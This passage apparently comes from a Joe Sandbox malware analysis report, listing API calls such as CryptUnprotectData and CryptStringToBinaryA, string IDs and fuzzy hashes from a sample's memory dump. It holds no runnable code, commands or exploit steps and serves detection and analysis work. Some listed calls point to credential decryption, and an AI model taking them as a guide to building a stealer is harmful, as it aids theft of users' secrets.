                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00BA4F3E,00000000,?), ref: 00BAA251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA27A
                                  • LocalFree.KERNEL32(?,?,?,?,00BA4F3E,00000000,?), ref: 00BAA28F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 0b3e7f36be4c39f1e7b306ab72b6e7b26c119063242a82102297f71bd675155d
                                  • Instruction ID: 598d51187a6f2e79881d38a74d7bf6038ef5ab07f0a34f23f1551f3dadb62c9f
                                  • Opcode Fuzzy Hash: 0b3e7f36be4c39f1e7b306ab72b6e7b26c119063242a82102297f71bd675155d
                                  • Instruction Fuzzy Hash: A011A4B4244308EFEB11CF64DC95FAA77B5EB89B10F208498FD199B390C772A941CB50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0130E588,00000000,?,00BC0DF8,00000000,?,00000000,00000000), ref: 00BB7BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0130E588,00000000,?,00BC0DF8,00000000,?,00000000,00000000,?), ref: 00BB7C0D
                                  • wsprintfA.USER32 ref: 00BB7C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 161db8e96e599904417ab2fd8231594e0c846f613653cd7ddd8fbe0bccac70d1
                                  • Instruction ID: 0f863ee44cada712b3398ab8ce47817acfd585eb52c957a9c5bbc16961981317
                                  • Opcode Fuzzy Hash: 161db8e96e599904417ab2fd8231594e0c846f613653cd7ddd8fbe0bccac70d1
                                  • Instruction Fuzzy Hash: A6118EB1949218EFEB20DF55DC45FA9BBB8FB44711F1003E9F619A32E0DB745A848B50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 3B?d$4J3$HO\
                                  • API String ID: 0-3104957160
                                  • Opcode ID: b50ebdfcba7c4b821547a191e0fe9e64eb644ff4bd623a4308261b5fb7c55b4a
                                  • Instruction ID: a039c29049ee2c655061c582d082a1859a57f7d4a57e27ec432e61ca00c57fa4
                                  • Opcode Fuzzy Hash: b50ebdfcba7c4b821547a191e0fe9e64eb644ff4bd623a4308261b5fb7c55b4a
                                  • Instruction Fuzzy Hash: 77B225F3A0C2049FE304AE29EC8567AFBE5EF98720F16493DE6C4C3744E63598458697
                                  APIs
                                  • CoCreateInstance.COMBASE(00BBE120,00000000,00000001,00BBE110,00000000), ref: 00BB39A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BB3A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 920b264a5d9a44dbf7a68683a0db156a2cb84a3e72ee55b7cdd6c304093c2d4b
                                  • Instruction ID: f2c925f40ea14f6f4168663bc1d5c39a001d1fb3fe7f1899a6c0eba98e51556e
                                  • Opcode Fuzzy Hash: 920b264a5d9a44dbf7a68683a0db156a2cb84a3e72ee55b7cdd6c304093c2d4b
                                  • Instruction Fuzzy Hash: 1B410970A40A289FDB24DB58CC95BDBB7B4AB48702F5041D8E619E72A0D7B16EC5CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BAA2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BAA2F3
                                  • LocalFree.KERNEL32(?), ref: 00BAA323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: cdff6282b476a6a738fa2f469675c9c59b36e7523ce11ad9fa3e5a2e44102013
                                  • Instruction ID: 45fdf4323cc3a58fb0ef2475b1ac9e1615d00fe043bfb895044f1a87f02e5576
                                  • Opcode Fuzzy Hash: cdff6282b476a6a738fa2f469675c9c59b36e7523ce11ad9fa3e5a2e44102013
                                  • Instruction Fuzzy Hash: B111B7B8A00209EFCB04DFA5D985AAEB7B5FF89300F1045A9ED15A7350D730AE54CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 34$bM5
                                  • API String ID: 0-608696887
                                  • Opcode ID: a8e99287ab55b8bb49fc20abb1d60579ef9dac2d793788e5bc5d251f6c14043b
                                  • Instruction ID: 407ee019bb89ea0049402ee24aca231dc94b719801b04fc8e174cd02625386c1
                                  • Opcode Fuzzy Hash: a8e99287ab55b8bb49fc20abb1d60579ef9dac2d793788e5bc5d251f6c14043b
                                  • Instruction Fuzzy Hash: 0F52E6F360C2049FD304AE2DEC8577AFBE9EF94720F16852DEAC4C3744EA3558458696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: d2d7bb67f78d17b01ceb68b45f2e6ce87ad863c324919a1598a79620ffbddea5
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: 3B720472908B50DFD718CF14C8906AEB7E2AFD6310F698A1DF4A55B391D370DD82AB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: EdW~$WYmy
                                  • API String ID: 0-160116925
                                  • Opcode ID: 5f458d0497c9e6e112d1be09caf5175d0a4482aebdbeb2e85c9970379e279c45
                                  • Instruction ID: 0c1a7aa12767ef8f82f2c9f58b7b430c439af5c872cf044fbaf42af9d66e8725
                                  • Opcode Fuzzy Hash: 5f458d0497c9e6e112d1be09caf5175d0a4482aebdbeb2e85c9970379e279c45
                                  • Instruction Fuzzy Hash: 8652E5F390C6109FE304AE2DDC8577AB7E9EF94720F1A492DEAC487344E63598408797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: 2fa206f20abbf72ba79a5dcfdfc9885706d4f9fbaaf4438aa6d8525a590cf3e7
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: 58A2D0B1C0426C8AEF18CB68C8913FDBBF1EF45300F1842EADA5677281D7755E899B51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: @Wo
                                  • API String ID: 0-1932671980
                                  • Opcode ID: 03cda79ea800828b07625b9aa02000512139942b8941ecefcecb25e5a8b996bd
                                  • Instruction ID: 2648c6ead367dddcae3e0a3b4a6de579f7238e498045a325c01a73c7671b2cca
                                  • Opcode Fuzzy Hash: 03cda79ea800828b07625b9aa02000512139942b8941ecefcecb25e5a8b996bd
                                  • Instruction Fuzzy Hash: C572C3F39086009FE304AE2DEC8577ABBE5EF94720F1A493DEAC4C7744E63598448697
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: 319c46f03fff9002e98beba0295cbf3c4054a9e3ae7f34eefc1e571c52e5fee0
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: DEE1D2316083499FC735CE28C8807BFB7E2EF89300F554A6DE6D997291DB319949CB82
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: 4e3d70ad446b553db1d17942c33f1e1bfbeb3c6b7d877c2635bf648155266ef7
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: 7AE1C431A083099FDB24CE18C8917BFB7E2EFC5310F15896DEA9997251D730EC498B46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7r\z
                                  • API String ID: 0-3172149568
                                  • Opcode ID: 66bc79f5f588736e1266af03f574e9a972ae9e08b4ba97292e93ccaf4c7d8d75
                                  • Instruction ID: e3b1042484df4bef4f0a4ccd1c4504f956dd4a3c06137ae98d054e1ae70a0269
                                  • Opcode Fuzzy Hash: 66bc79f5f588736e1266af03f574e9a972ae9e08b4ba97292e93ccaf4c7d8d75
                                  • Instruction Fuzzy Hash: 391229F3A0C610AFE3106E2DEC8577AFBE5EF94760F1A853DEAC493744E53558048692
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: 95b90b4365f5995f78cd1535ab639a5b8aa690808c0d290ffeb37f6fe4c82ccf
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: 92E15B71D442698EEB10CF59C8843BEBFF2AB85314F19C569D4B46B2D2D3368E46CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: r:e
                                  • API String ID: 0-806617135
                                  • Opcode ID: 77779777c0340656b4eb52415c3c73551c9d4997e4d5d461e2102b9bc204d729
                                  • Instruction ID: d45ef2b37f4784928042b3dccc4233814ec6d8a23dbcb670086030c76023c82f
                                  • Opcode Fuzzy Hash: 77779777c0340656b4eb52415c3c73551c9d4997e4d5d461e2102b9bc204d729
                                  • Instruction Fuzzy Hash: 55510BF3E081109BF304AA2DDC8576AF7E5EBD4320F1A853DEAC8D3744E9395C168696
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction ID: 59ad592c4a40935bc71ac57e7b4cb3ee74775818b68691deece13f83342f9b1d
                                  • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                  • Instruction Fuzzy Hash: 4082F0B5900F458FD365CF29C880BA2B7E1BF4A300F548A6ED9EA9B751DB30B945CB50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction ID: 3149d8f4c3a72e0259cf855d3519ce99d226bd40fbd112e26c18735cb1b0bc7d
                                  • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                  • Instruction Fuzzy Hash: ED4281706047818FD725CF1AC094765FBE2FF95314F288AAEC49A8B792D735E889CB50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction ID: 370a48ab052df08018a50b544e7aa19de05bca3f7329326b3c5dc20112a721c6
                                  • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                  • Instruction Fuzzy Hash: 8202F571E002168FCB11CF69C8906EFB7E2AF9A350F16831AE815B7751D771AD829BD0
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                  • Instruction ID: d4dcff19ab56e7da53d89a521c45577f1285cebc5086ae3999303cf73968dee0
                                  • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                  • Instruction Fuzzy Hash: BA022F74A083098FDB14CF29C880379B7E1EFA5340F15C76EEA9997362D371E8898B41
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                  • Instruction ID: 43e160da447e05eeed344131c3da2c26d27ed1edaa04bb0c5b06f2c5be2229ad
                                  • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                  • Instruction Fuzzy Hash: F6F16B6260C6E14BC71D9A2584F08BD7FD29BA9201F0E86ADFDD70F393DA24DA01DB51
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                  • Instruction ID: e198ea5da5367e9396aebfe847357002d3dd2cbe77473a24ec5190fd4341daeb
                                  • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                  • Instruction Fuzzy Hash: AED17873F10A254BEB08CE99DC913ADB6E2EBD8350F19413ED916F7781D6B89D018790
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                  • Instruction ID: 400551ce8daf74a00a08ba2a537e7a1584714772df23d94c39232d04d6df31df
                                  • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                  • Instruction Fuzzy Hash: C3D1F571E002198FDF24CF98C8817EEB7B1BF4A310F248229E965A7291D7745DC6EB91
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction ID: 31a0cf2cbf98dde183a0c749aa034731945bba13cbed119fcb3da049a147a1a2
                                  • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction Fuzzy Hash: C7027974E006598FCF16CFA8C4909EDBBF6FF89310F548199E8896B355C730AA95CB50
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                  • Instruction ID: dcb2c34f69accc6b09ac3439f033b64a985981dffb8e442e2566f3a63325039f
                                  • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                  • Instruction Fuzzy Hash: 68021375E00619CFCF15CF98C4809ADB7B6FF88350F258169E809AB355D731AA96CF90
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                  • Instruction ID: 9cdf71852dbadd9a2760f35f3628dab0b39a9fc372d92bd1ea6b445cfc00268e
                                  • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                  • Instruction Fuzzy Hash: F6C16E76E29B814BD713873DD8022A5F395AFE7290F15D72EFCE472982FB2096819244
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                  • Instruction ID: ccfe4e33387d3f2fb74ea6b76a74dccb5354dd1da4a275be0733ae6c2ec378b1
                                  • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                  • Instruction Fuzzy Hash: 2AB1E336D052AA9FDF21CBB4C4502EDBFB2AF52300F59C156D4946B2C2DB344E8AC790
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                  • Instruction ID: e365a5335113bce836d4c879b1b2c4a126135ba2d57ef0eeaa4c4dddb7d007a7
                                  • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                  • Instruction Fuzzy Hash: 10D13670600B41CFD725CF29C894BA7B7E0BB59304F14892ED8AA8BB91DB35F945CB91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                  • Instruction ID: 7457828ddc522e83220046f2d9627a7cbc36b622f62da295d7f0cbab64b09f77
                                  • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                  • Instruction Fuzzy Hash: D2D11BB01083948FD7148F25C0A473BBFE1AF95708F19899EE5D90B391D7BA864CDB92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                  • Instruction ID: 40091108e6c49a26a401a97f509a2e9efb6b330cbac8fcdeb831dd62360e2e9d
                                  • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                  • Instruction Fuzzy Hash: 0DB19072E083515BD308CF25C89136BF7E2EFC8310F1ACA3EE89997291D774D9419A82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                  • Instruction ID: 5ce680c7b3058216fb093509c7547125cffd1f54d47b096a9c2e24971279d06d
                                  • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                  • Instruction Fuzzy Hash: 4CB19072A083515BD308CF25C89176BF7E2EFC8310F1AC93EE89997391D778D9459A82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
